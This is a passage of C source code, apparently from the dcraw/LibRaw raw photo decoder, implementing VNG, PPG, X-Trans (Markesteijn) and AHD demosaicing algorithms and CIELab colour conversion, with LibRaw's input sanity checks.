int prow=8, pcol=2, *ip, *code[16][16], gval[8], gmin, gmax, sum[4];
int row, col, x, y, x1, x2, y1, y2, t, weight, grads, color, diag;
int g, diff, thold, num, c;
lin_interpolate();
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("VNG interpolation...\n"));
#endif
if (filters == 1) prow = pcol = 16;
if (filters == 9) prow = pcol = 6;
ip = (int *) calloc (prow*pcol, 1280);
merror (ip, "vng_interpolate()");
for (row=0; row < prow; row++) /* Precalculate for VNG */
for (col=0; col < pcol; col++) {
code[row][col] = ip;
for (cp=terms, t=0; t < 64; t++) {
y1 = *cp++; x1 = *cp++;
y2 = *cp++; x2 = *cp++;
weight = *cp++;
grads = *cp++;
color = fcol(row+y1,col+x1);
if (fcol(row+y2,col+x2) != color) continue;
diag = (fcol(row,col+1) == color && fcol(row+1,col) == color) ? 2:1;
if (abs(y1-y2) == diag && abs(x1-x2) == diag) continue;
*ip++ = (y1*width + x1)*4 + color;
*ip++ = (y2*width + x2)*4 + color;
*ip++ = weight;
for (g=0; g < 8; g++)
if (grads & 1<<g) *ip++ = g;
*ip++ = -1;
}
*ip++ = INT_MAX;
for (cp=chood, g=0; g < 8; g++) {
y = *cp++; x = *cp++;
*ip++ = (y*width + x) * 4;
color = fcol(row,col);
if (fcol(row+y,col+x) != color && fcol(row+y*2,col+x*2) == color)
*ip++ = (y*width + x) * 8 + color;
else
*ip++ = 0;
}
}
brow[4] = (ushort (*)[4]) calloc (width*3, sizeof **brow);
merror (brow[4], "vng_interpolate()");
for (row=0; row < 3; row++)
brow[row] = brow[4] + row*width;
for (row=2; row < height-2; row++) { /* Do VNG interpolation */
#ifdef LIBRAW_LIBRARY_BUILD
if(!((row-2)%256))RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,(row-2)/256+1,((height-3)/256)+1);
#endif
for (col=2; col < width-2; col++) {
pix = image[row*width+col];
ip = code[row % prow][col % pcol];
memset (gval, 0, sizeof gval);
while ((g = ip[0]) != INT_MAX) { /* Calculate gradients */
diff = ABS(pix[g] - pix[ip[1]]) << ip[2];
gval[ip[3]] += diff;
ip += 5;
if ((g = ip[-1]) == -1) continue;
gval[g] += diff;
while ((g = *ip++) != -1)
gval[g] += diff;
}
ip++;
gmin = gmax = gval[0]; /* Choose a threshold */
for (g=1; g < 8; g++) {
if (gmin > gval[g]) gmin = gval[g];
if (gmax < gval[g]) gmax = gval[g];
}
if (gmax == 0) {
memcpy (brow[2][col], pix, sizeof *image);
continue;
}
thold = gmin + (gmax >> 1);
memset (sum, 0, sizeof sum);
color = fcol(row,col);
for (num=g=0; g < 8; g++,ip+=2) { /* Average the neighbors */
if (gval[g] <= thold) {
FORCC
if (c == color && ip[1])
sum[c] += (pix[c] + pix[ip[1]]) >> 1;
else
sum[c] += pix[ip[0] + c];
num++;
}
}
FORCC { /* Save to buffer */
t = pix[color];
if (c != color)
t += (sum[c] - sum[color]) / num;
brow[2][col][c] = CLIP(t);
}
}
if (row > 3) /* Write buffer to image */
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
for (g=0; g < 4; g++)
brow[(g-1) & 3] = brow[g];
}
memcpy (image[(row-2)*width+2], brow[0]+2, (width-4)*sizeof *image);
memcpy (image[(row-1)*width+2], brow[1]+2, (width-4)*sizeof *image);
free (brow[4]);
free (code[0][0]);
}
/*
Patterned Pixel Grouping Interpolation by Alain Desbiolles
*/
void CLASS ppg_interpolate()
{
int dir[5] = { 1, width, -1, -width, 1 };
int row, col, diff[2], guess[2], c, d, i;
ushort (*pix)[4];
border_interpolate(3);
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("PPG interpolation...\n"));
#endif
/* Fill in the green layer with gradients and pattern recognition: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,0,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=3; row < height-3; row++)
for (col=3+(FC(row,3) & 1), c=FC(row,col); col < width-3; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; i++) {
guess[i] = (pix[-d][1] + pix[0][c] + pix[d][1]) * 2
- pix[-2*d][c] - pix[2*d][c];
diff[i] = ( ABS(pix[-2*d][c] - pix[ 0][c]) +
ABS(pix[ 2*d][c] - pix[ 0][c]) +
ABS(pix[ -d][1] - pix[ d][1]) ) * 3 +
( ABS(pix[ 3*d][1] - pix[ d][1]) +
ABS(pix[-3*d][1] - pix[-d][1]) ) * 2;
}
d = dir[i = diff[0] > diff[1]];
pix[0][1] = ULIM(guess[i] >> 2, pix[d][1], pix[-d][1]);
}
/* Calculate red and blue for each green pixel: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,1,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,2) & 1), c=FC(row,col+1); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]) > 0; c=2-c, i++)
pix[0][c] = CLIP((pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1]) >> 1);
}
/* Calculate blue for red pixels and vice versa: */
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_INTERPOLATE,2,3);
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel for default(shared) private(guess, diff, row, col, d, c, i, pix) schedule(static)
#endif
#endif
for (row=1; row < height-1; row++)
for (col=1+(FC(row,1) & 1), c=2-FC(row,col); col < width-1; col+=2) {
pix = image + row*width+col;
for (i=0; (d=dir[i]+dir[i+1]) > 0; i++) {
diff[i] = ABS(pix[-d][c] - pix[d][c]) +
ABS(pix[-d][1] - pix[0][1]) +
ABS(pix[ d][1] - pix[0][1]);
guess[i] = pix[-d][c] + pix[d][c] + 2*pix[0][1]
- pix[-d][1] - pix[d][1];
}
if (diff[0] != diff[1])
pix[0][c] = CLIP(guess[diff[0] > diff[1]] >> 1);
else
pix[0][c] = CLIP((guess[0]+guess[1]) >> 2);
}
}
void CLASS cielab (ushort rgb[3], short lab[3])
{
int c, i, j, k;
float r, xyz[3];
#ifdef LIBRAW_NOTHREADS
static float cbrt[0x10000], xyz_cam[3][4];
#else
#define cbrt tls->ahd_data.cbrt
#define xyz_cam tls->ahd_data.xyz_cam
#endif
if (!rgb) {
#ifndef LIBRAW_NOTHREADS
if(cbrt[0] < -1.0f)
#endif
for (i=0; i < 0x10000; i++) {
r = i / 65535.0;
cbrt[i] = r > 0.008856 ? pow(r,1.f/3.0f) : 7.787f*r + 16.f/116.0f;
}
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (xyz_cam[i][j] = k=0; k < 3; k++)
xyz_cam[i][j] += xyz_rgb[i][k] * rgb_cam[k][j] / d65_white[i];
return;
}
xyz[0] = xyz[1] = xyz[2] = 0.5;
FORCC {
xyz[0] += xyz_cam[0][c] * rgb[c];
xyz[1] += xyz_cam[1][c] * rgb[c];
xyz[2] += xyz_cam[2][c] * rgb[c];
}
xyz[0] = cbrt[CLIP((int) xyz[0])];
xyz[1] = cbrt[CLIP((int) xyz[1])];
xyz[2] = cbrt[CLIP((int) xyz[2])];
lab[0] = 64 * (116 * xyz[1] - 16);
lab[1] = 64 * 500 * (xyz[0] - xyz[1]);
lab[2] = 64 * 200 * (xyz[1] - xyz[2]);
#ifndef LIBRAW_NOTHREADS
#undef cbrt
#undef xyz_cam
#endif
}
#define TS 512 /* Tile Size */
#define fcol(row,col) xtrans[(row+6) % 6][(col+6) % 6]
/*
Frank Markesteijn's algorithm for Fuji X-Trans sensors
*/
void CLASS xtrans_interpolate (int passes)
{
int c, d, f, g, h, i, v, ng, row, col, top, left, mrow, mcol;
#ifdef LIBRAW_LIBRARY_BUILD
int cstat[4]={0,0,0,0};
#endif
int val, ndir, pass, hm[8], avg[4], color[3][8];
static const short orth[12] = { 1,0,0,1,-1,0,0,-1,1,0,0,1 },
patt[2][16] = { { 0,1,0,-1,2,0,-1,0,1,1,1,-1,0,0,0,0 },
{ 0,1,0,-2,1,0,-2,0,1,1,-2,-2,1,-1,-1,1 } },
dir[4] = { 1,TS,TS+1,TS-1 };
short allhex[3][3][2][8], *hex;
ushort min, max, sgrow, sgcol;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab) [TS][3], (*lix)[3];
float (*drv)[TS][TS], diff[6], tr;
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("%d-pass X-Trans interpolation...\n"), passes);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(width < TS || height < TS)
throw LIBRAW_EXCEPTION_IO_CORRUPT; // too small image
/* Check against right pattern */
for (row = 0; row < 6; row++)
for (col = 0; col < 6; col++)
cstat[fcol(row,col)]++;
if(cstat[0] < 6 || cstat[0]>10 || cstat[1]< 16
|| cstat[1]>24 || cstat[2]< 6 || cstat[2]>10 || cstat[3])
throw LIBRAW_EXCEPTION_IO_CORRUPT;
// Init allhex table to unreasonable values
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
allhex[i][j][k][l]=32700;
#endif
cielab (0,0);
ndir = 4 << (passes > 1);
buffer = (char *) malloc (TS*TS*(ndir*11+6));
merror (buffer, "xtrans_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*) [TS][3])(buffer + TS*TS*(ndir*6));
drv = (float (*)[TS][TS]) (buffer + TS*TS*(ndir*6+6));
homo = (char (*)[TS][TS]) (buffer + TS*TS*(ndir*10+6));
int minv=0,maxv=0,minh=0,maxh=0;
/* Map a green hexagon around each non-green pixel and vice versa: */
for (row=0; row < 3; row++)
for (col=0; col < 3; col++)
for (ng=d=0; d < 10; d+=2) {
g = fcol(row,col) == 1;
if (fcol(row+orth[d],col+orth[d+2]) == 1) ng=0; else ng++;
if (ng == 4) { sgrow = row; sgcol = col; }
if (ng == g+1) FORC(8) {
v = orth[d ]*patt[g][c*2] + orth[d+1]*patt[g][c*2+1];
h = orth[d+2]*patt[g][c*2] + orth[d+3]*patt[g][c*2+1];
minv=MIN(v,minv);
maxv=MAX(v,maxv);
minh=MIN(v,minh);
maxh=MAX(v,maxh);
allhex[row][col][0][c^(g*2 & d)] = h + v*width;
allhex[row][col][1][c^(g*2 & d)] = h + v*TS;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
// Check allhex table initialization
for(int i = 0; i < 3; i++)
for(int j = 0; j < 3; j++)
for(int k = 0; k < 2; k++)
for(int l = 0; l < 8; l++)
if(allhex[i][j][k][l]>maxh+maxv*width+1 || allhex[i][j][k][l]<minh+minv*width-1)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int retrycount = 0;
#endif
/* Set green1 and green3 to the minimum and maximum allowed values: */
for (row=2; row < height-2; row++)
for (min=~(max=0), col=2; col < width-2; col++) {
if (fcol(row,col) == 1 && (min=~(max=0))) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
if (!max) FORC(6) {
val = pix[hex[c]][1];
if (min > val) min = val;
if (max < val) max = val;
}
pix[0][1] = min;
pix[0][3] = max;
switch ((row-sgrow) % 3) {
case 1: if (row < height-3) { row++; col--; } break;
case 2:
if ((min = ~(max = 0)) && (col += 2) < width - 3 && row > 2)
{
row--;
#ifdef LIBRAW_LIBRARY_BUILD
if(retrycount++ > width*height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
}
}
}
for (top=3; top < height-19; top += TS-16)
for (left=3; left < width-19; left += TS-16) {
mrow = MIN (top+TS, height-3);
mcol = MIN (left+TS, width-3);
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++)
memcpy (rgb[0][row-top][col-left], image[row*width+col], 6);
FORC3 memcpy (rgb[c+1], rgb[0], sizeof *rgb);
/* Interpolate green horizontally, vertically, and along both diagonals: */
for (row=top; row < mrow; row++)
for (col=left; col < mcol; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][0];
color[1][0] = 174 * (pix[ hex[1]][1] + pix[ hex[0]][1]) -
46 * (pix[2*hex[1]][1] + pix[2*hex[0]][1]);
color[1][1] = 223 * pix[ hex[3]][1] + pix[ hex[2]][1] * 33 +
92 * (pix[ 0 ][f] - pix[ -hex[2]][f]);
FORC(2) color[1][2+c] =
164 * pix[hex[4+c]][1] + 92 * pix[-2*hex[4+c]][1] + 33 *
(2*pix[0][f] - pix[3*hex[4+c]][f] - pix[-3*hex[4+c]][f]);
FORC4 rgb[c^!((row-sgrow) % 3)][row-top][col-left][1] =
LIM(color[1][c] >> 8,pix[0][1],pix[0][3]);
}
for (pass=0; pass < passes; pass++) {
if (pass == 1)
memcpy (rgb+=4, buffer, 4*sizeof *rgb);
/* Recalculate green from interpolated values of closer pixels: */
if (pass) {
for (row=top+2; row < mrow-2; row++)
for (col=left+2; col < mcol-2; col++) {
if ((f = fcol(row,col)) == 1) continue;
pix = image + row*width + col;
hex = allhex[row % 3][col % 3][1];
for (d=3; d < 6; d++) {
rix = &rgb[(d-2)^!((row-sgrow) % 3)][row-top][col-left];
val = rix[-2*hex[d]][1] + 2*rix[hex[d]][1]
- rix[-2*hex[d]][f] - 2*rix[hex[d]][f] + 3*rix[0][f];
rix[0][1] = LIM(val/3,pix[0][1],pix[0][3]);
}
}
}
/* Interpolate red and blue values for solitary green pixels: */
for (row=(top-sgrow+4)/3*3+sgrow; row < mrow-2; row+=3)
for (col=(left-sgcol+4)/3*3+sgcol; col < mcol-2; col+=3) {
rix = &rgb[0][row-top][col-left];
h = fcol(row,col+1);
memset (diff, 0, sizeof diff);
for (i=1, d=0; d < 6; d++, i^=TS^1, h^=2) {
for (c=0; c < 2; c++, h^=2) {
g = 2*rix[0][1] - rix[i<<c][1] - rix[-i<<c][1];
color[h][d] = g + rix[i<<c][h] + rix[-i<<c][h];
if (d > 1)
diff[d] += SQR (rix[i<<c][1] - rix[-i<<c][1]
- rix[i<<c][h] + rix[-i<<c][h]) + SQR(g);
}
if (d > 1 && (d & 1))
if (diff[d-1] < diff[d])
FORC(2) color[c*2][d] = color[c*2][d-1];
if (d < 2 || (d & 1)) {
FORC(2) rix[0][c*2] = CLIP(color[c*2][d]/2);
rix += TS*TS;
}
}
}
/* Interpolate red for blue pixels and vice versa: */
for (row=top+3; row < mrow-3; row++)
for (col=left+3; col < mcol-3; col++) {
if ((f = 2-fcol(row,col)) == 1) continue;
rix = &rgb[0][row-top][col-left];
c = (row-sgrow) % 3 ? TS:1;
h = 3 * (c ^ TS ^ 1);
for (d=0; d < 4; d++, rix += TS*TS) {
i = d > 1 || ((d ^ c) & 1) ||
((ABS(rix[0][1]-rix[c][1])+ABS(rix[0][1]-rix[-c][1])) <
2*(ABS(rix[0][1]-rix[h][1])+ABS(rix[0][1]-rix[-h][1]))) ? c:h;
rix[0][f] = CLIP((rix[i][f] + rix[-i][f] +
2*rix[0][1] - rix[i][1] - rix[-i][1])/2);
}
}
/* Fill in red and blue for 2x2 blocks of green: */
for (row=top+2; row < mrow-2; row++) if ((row-sgrow) % 3)
for (col=left+2; col < mcol-2; col++) if ((col-sgcol) % 3) {
rix = &rgb[0][row-top][col-left];
hex = allhex[row % 3][col % 3][1];
for (d=0; d < ndir; d+=2, rix += TS*TS)
if (hex[d] + hex[d+1]) {
g = 3*rix[0][1] - 2*rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + 2*rix[hex[d]][c] + rix[hex[d+1]][c])/3);
} else {
g = 2*rix[0][1] - rix[hex[d]][1] - rix[hex[d+1]][1];
for (c=0; c < 4; c+=2) rix[0][c] =
CLIP((g + rix[hex[d]][c] + rix[hex[d+1]][c])/2);
}
}
}
rgb = (ushort(*)[TS][TS][3]) buffer;
mrow -= top;
mcol -= left;
/* Convert to CIELab and differentiate in all directions: */
for (d=0; d < ndir; d++) {
for (row=2; row < mrow-2; row++)
for (col=2; col < mcol-2; col++)
cielab (rgb[d][row][col], lab[row][col]);
for (f=dir[d & 3],row=3; row < mrow-3; row++)
for (col=3; col < mcol-3; col++) {
lix = &lab[row][col];
g = 2*lix[0][0] - lix[f][0] - lix[-f][0];
drv[d][row][col] = SQR(g)
+ SQR((2*lix[0][1] - lix[f][1] - lix[-f][1] + g*500/232))
+ SQR((2*lix[0][2] - lix[f][2] - lix[-f][2] - g*500/580));
}
}
/* Build homogeneity maps from the derivatives: */
memset(homo, 0, ndir*TS*TS);
for (row=4; row < mrow-4; row++)
for (col=4; col < mcol-4; col++) {
for (tr=FLT_MAX, d=0; d < ndir; d++)
if (tr > drv[d][row][col])
tr = drv[d][row][col];
tr *= 8;
for (d=0; d < ndir; d++)
for (v=-1; v <= 1; v++)
for (h=-1; h <= 1; h++)
if (drv[d][row+v][col+h] <= tr)
homo[d][row][col]++;
}
/* Average the most homogenous pixels for the final result: */
if (height-top < TS+4) mrow = height-top+2;
if (width-left < TS+4) mcol = width-left+2;
for (row = MIN(top,8); row < mrow-8; row++)
for (col = MIN(left,8); col < mcol-8; col++) {
for (d=0; d < ndir; d++)
for (hm[d]=0, v=-2; v <= 2; v++)
for (h=-2; h <= 2; h++)
hm[d] += homo[d][row+v][col+h];
for (d=0; d < ndir-4; d++)
if (hm[d] < hm[d+4]) hm[d ] = 0; else
if (hm[d] > hm[d+4]) hm[d+4] = 0;
for (max=hm[0],d=1; d < ndir; d++)
if (max < hm[d]) max = hm[d];
max -= max >> 3;
memset (avg, 0, sizeof avg);
for (d=0; d < ndir; d++)
if (hm[d] >= max) {
FORC3 avg[c] += rgb[d][row][col][c];
avg[3]++;
}
FORC3 image[(row+top)*width+col+left][c] = avg[c]/avg[3];
}
}
free(buffer);
border_interpolate(8);
}
#undef fcol
/*
Adaptive Homogeneity-Directed interpolation is based on
the work of Keigo Hirakawa, Thomas Parks, and Paul Lee.
*/
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS ahd_interpolate_green_h_and_v(int top, int left, ushort (*out_rgb)[TS][TS][3])
{
int row, col;
int c, val;
ushort (*pix)[4];
const int rowlimit = MIN(top+TS, height-2);
const int collimit = MIN(left+TS, width-2);
for (row = top; row < rowlimit; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < collimit; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
out_rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
out_rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
}
void CLASS ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][3], short (*out_lab)[TS][3])
{
unsigned row, col;
int c, val;
ushort (*pix)[4];
ushort (*rix)[3];
short (*lix)[3];
float xyz[3];
const unsigned num_pix_per_row = 4*width;
const unsigned rowlimit = MIN(top+TS-1, height-3);
const unsigned collimit = MIN(left+TS-1, width-3);
ushort *pix_above;
ushort *pix_below;
int t1, t2;
for (row = top+1; row < rowlimit; row++) {
pix = image + row*width + left;
rix = &inout_rgb[row-top][0];
lix = &out_lab[row-top][0];
for (col = left+1; col < collimit; col++) {
pix++;
pix_above = &pix[0][0] - num_pix_per_row;
pix_below = &pix[0][0] + num_pix_per_row;
rix++;
lix++;
c = 2 - FC(row, col);
if (c == 1) {
c = FC(row+1,col);
t1 = 2-c;
val = pix[0][1] + (( pix[-1][t1] + pix[1][t1]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][t1] = CLIP(val);
val = pix[0][1] + (( pix_above[c] + pix_below[c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else {
t1 = -4+c; /* -4+c: pixel of color c to the left */
t2 = 4+c; /* 4+c: pixel of color c to the right */
val = rix[0][1] + (( pix_above[t1] + pix_above[t2]
+ pix_below[t1] + pix_below[t2]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
}
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab(rix[0],lix[0]);
}
}
}
void CLASS ahd_interpolate_r_and_b_and_convert_to_cielab(int top, int left, ushort (*inout_rgb)[TS][TS][3], short (*out_lab)[TS][TS][3])
{
int direction;
for (direction = 0; direction < 2; direction++) {
ahd_interpolate_r_and_b_in_rgb_and_convert_to_cielab(top, left, inout_rgb[direction], out_lab[direction]);
}
}
void CLASS ahd_interpolate_build_homogeneity_map(int top, int left, short (*lab)[TS][TS][3], char (*out_homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int direction;
int i;
short (*lix)[3];
short (*lixs[2])[3];
short *adjacent_lix;
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
static const int dir[4] = { -1, 1, -TS, TS };
const int rowlimit = MIN(top+TS-2, height-4);
const int collimit = MIN(left+TS-2, width-4);
int homogeneity;
char (*homogeneity_map_p)[2];
memset (out_homogeneity_map, 0, 2*TS*TS);
for (row=top+2; row < rowlimit; row++) {
tr = row-top;
homogeneity_map_p = &out_homogeneity_map[tr][1];
for (direction=0; direction < 2; direction++) {
lixs[direction] = &lab[direction][tr][1];
}
for (col=left+2; col < collimit; col++) {
tc = col-left;
homogeneity_map_p++;
for (direction=0; direction < 2; direction++) {
lix = ++lixs[direction];
for (i=0; i < 4; i++) {
adjacent_lix = lix[dir[i]];
ldiff[direction][i] = ABS(lix[0][0]-adjacent_lix[0]);
abdiff[direction][i] = SQR(lix[0][1]-adjacent_lix[1])
+ SQR(lix[0][2]-adjacent_lix[2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (direction=0; direction < 2; direction++) {
homogeneity = 0;
for (i=0; i < 4; i++) {
if (ldiff[direction][i] <= leps && abdiff[direction][i] <= abeps) {
homogeneity++;
}
}
homogeneity_map_p[0][direction] = homogeneity;
}
}
}
}
void CLASS ahd_interpolate_combine_homogeneous_pixels(int top, int left, ushort (*rgb)[TS][TS][3], char (*homogeneity_map)[TS][2])
{
int row, col;
int tr, tc;
int i, j;
int direction;
int hm[2];
int c;
const int rowlimit = MIN(top+TS-3, height-5);
const int collimit = MIN(left+TS-3, width-5);
ushort (*pix)[4];
ushort (*rix[2])[3];
for (row=top+3; row < rowlimit; row++) {
tr = row-top;
pix = &image[row*width+left+2];
for (direction = 0; direction < 2; direction++) {
rix[direction] = &rgb[direction][tr][2];
}
for (col=left+3; col < collimit; col++) {
tc = col-left;
pix++;
for (direction = 0; direction < 2; direction++) {
rix[direction]++;
}
for (direction=0; direction < 2; direction++) {
hm[direction] = 0;
for (i=tr-1; i <= tr+1; i++) {
for (j=tc-1; j <= tc+1; j++) {
hm[direction] += homogeneity_map[i][j][direction];
}
}
}
if (hm[0] != hm[1]) {
memcpy(pix[0], rix[hm[1] > hm[0]][0], 3 * sizeof(ushort));
} else {
FORC3 {
pix[0][c] = (rix[0][0][c] + rix[1][0][c]) >> 1;
}
}
}
}
}
void CLASS ahd_interpolate()
{
int i, j, k, top, left;
float xyz_cam[3][4],r;
char *buffer;
ushort (*rgb)[TS][TS][3];
short (*lab)[TS][TS][3];
char (*homo)[TS][2];
int terminate_flag = 0;
cielab(0,0);
border_interpolate(5);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp parallel private(buffer,rgb,lab,homo,top,left,i,j,k) shared(xyz_cam,terminate_flag)
#endif
#endif
{
buffer = (char *) malloc (26*TS*TS); /* 1664 kB */
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][2]) (buffer + 24*TS*TS);
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
#pragma omp for schedule(dynamic)
#endif
#endif
for (top=2; top < height-5; top += TS-6){
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_USE_OPENMP
if(0== omp_get_thread_num())
#endif
if(callbacks.progress_cb) {
int rr = (*callbacks.progress_cb)(callbacks.progresscb_data,LIBRAW_PROGRESS_INTERPOLATE,top-2,height-7);
if(rr)
terminate_flag = 1;
}
#endif
for (left=2; !terminate_flag && (left < width-5); left += TS-6) {
ahd_interpolate_green_h_and_v(top, left, rgb);
ahd_interpolate_r_and_b_and_convert_to_cielab(top, left, rgb, lab);
ahd_interpolate_build_homogeneity_map(top, left, lab, homo);
ahd_interpolate_combine_homogeneous_pixels(top, left, rgb, homo);
}
}
free (buffer);
}
#ifdef LIBRAW_LIBRARY_BUILD
if(terminate_flag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
}
#else
void CLASS ahd_interpolate()
{
int i, j, top, left, row, col, tr, tc, c, d, val, hm[2];
static const int dir[4] = { -1, 1, -TS, TS };
unsigned ldiff[2][4], abdiff[2][4], leps, abeps;
ushort (*rgb)[TS][TS][3], (*rix)[3], (*pix)[4];
short (*lab)[TS][TS][3], (*lix)[3];
char (*homo)[TS][TS], *buffer;
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("AHD interpolation...\n"));
#endif
cielab (0,0);
border_interpolate(5);
buffer = (char *) malloc (26*TS*TS);
merror (buffer, "ahd_interpolate()");
rgb = (ushort(*)[TS][TS][3]) buffer;
lab = (short (*)[TS][TS][3])(buffer + 12*TS*TS);
homo = (char (*)[TS][TS]) (buffer + 24*TS*TS);
for (top=2; top < height-5; top += TS-6)
for (left=2; left < width-5; left += TS-6) {
/* Interpolate green horizontally and vertically: */
for (row=top; row < top+TS && row < height-2; row++) {
col = left + (FC(row,left) & 1);
for (c = FC(row,col); col < left+TS && col < width-2; col+=2) {
pix = image + row*width+col;
val = ((pix[-1][1] + pix[0][c] + pix[1][1]) * 2
- pix[-2][c] - pix[2][c]) >> 2;
rgb[0][row-top][col-left][1] = ULIM(val,pix[-1][1],pix[1][1]);
val = ((pix[-width][1] + pix[0][c] + pix[width][1]) * 2
- pix[-2*width][c] - pix[2*width][c]) >> 2;
rgb[1][row-top][col-left][1] = ULIM(val,pix[-width][1],pix[width][1]);
}
}
/* Interpolate red and blue, and convert to CIELab: */
for (d=0; d < 2; d++)
for (row=top+1; row < top+TS-1 && row < height-3; row++)
for (col=left+1; col < left+TS-1 && col < width-3; col++) {
pix = image + row*width+col;
rix = &rgb[d][row-top][col-left];
lix = &lab[d][row-top][col-left];
if ((c = 2 - FC(row,col)) == 1) {
c = FC(row+1,col);
val = pix[0][1] + (( pix[-1][2-c] + pix[1][2-c]
- rix[-1][1] - rix[1][1] ) >> 1);
rix[0][2-c] = CLIP(val);
val = pix[0][1] + (( pix[-width][c] + pix[width][c]
- rix[-TS][1] - rix[TS][1] ) >> 1);
} else
val = rix[0][1] + (( pix[-width-1][c] + pix[-width+1][c]
+ pix[+width-1][c] + pix[+width+1][c]
- rix[-TS-1][1] - rix[-TS+1][1]
- rix[+TS-1][1] - rix[+TS+1][1] + 1) >> 2);
rix[0][c] = CLIP(val);
c = FC(row,col);
rix[0][c] = pix[0][c];
cielab (rix[0],lix[0]);
}
/* Build homogeneity maps from the CIELab images: */
memset (homo, 0, 2*TS*TS);
for (row=top+2; row < top+TS-2 && row < height-4; row++) {
tr = row-top;
for (col=left+2; col < left+TS-2 && col < width-4; col++) {
tc = col-left;
for (d=0; d < 2; d++) {
lix = &lab[d][tr][tc];
for (i=0; i < 4; i++) {
ldiff[d][i] = ABS(lix[0][0]-lix[dir[i]][0]);
abdiff[d][i] = SQR(lix[0][1]-lix[dir[i]][1])
+ SQR(lix[0][2]-lix[dir[i]][2]);
}
}
leps = MIN(MAX(ldiff[0][0],ldiff[0][1]),
MAX(ldiff[1][2],ldiff[1][3]));
abeps = MIN(MAX(abdiff[0][0],abdiff[0][1]),
MAX(abdiff[1][2],abdiff[1][3]));
for (d=0; d < 2; d++)
for (i=0; i < 4; i++)
if (ldiff[d][i] <= leps && abdiff[d][i] <= abeps)
homo[d][tr][tc]++;
}
}
/* Combine the most homogenous pixels for the final result: */
for (row=top+3; row < top+TS-3 && row < height-5; row++) {
tr = row-top;
for (col=left+3; col < left+TS-3 && col < width-5; col++) {
tc = col-left;
for (d=0; d < 2; d++)
for (hm[d]=0, i=tr-1; i <= tr+1; i++)
for (j=tc-1; j <= tc+1; j++)
hm[d] += homo[d][i][j];
if (hm[0] != hm[1])
FORC3 image[row*width+col][c] = rgb[hm[1] > hm[0]][tr][tc][c];
else
FORC3 image[row*width+col][c] =
(rgb[0][tr][tc][c] + rgb[1][tr][tc][c]) >> 1;
}
}
}
free (buffer);
}
#endif
#undef TS
void CLASS median_filter()
{
ushort (*pix)[4];
int pass, c, i, j, k, med[9];
static const uchar opt[] = /* Optimal 9-element median search */
{ 1,2, 4,5, 7,8, 0,1, 3,4, 6,7, 1,2, 4,5, 7,8,
0,3, 5,8, 4,7, 3,6, 1,4, 2,5, 4,7, 4,2, 6,4, 4,2 };
for (pass=1; pass <= med_passes; pass++) {
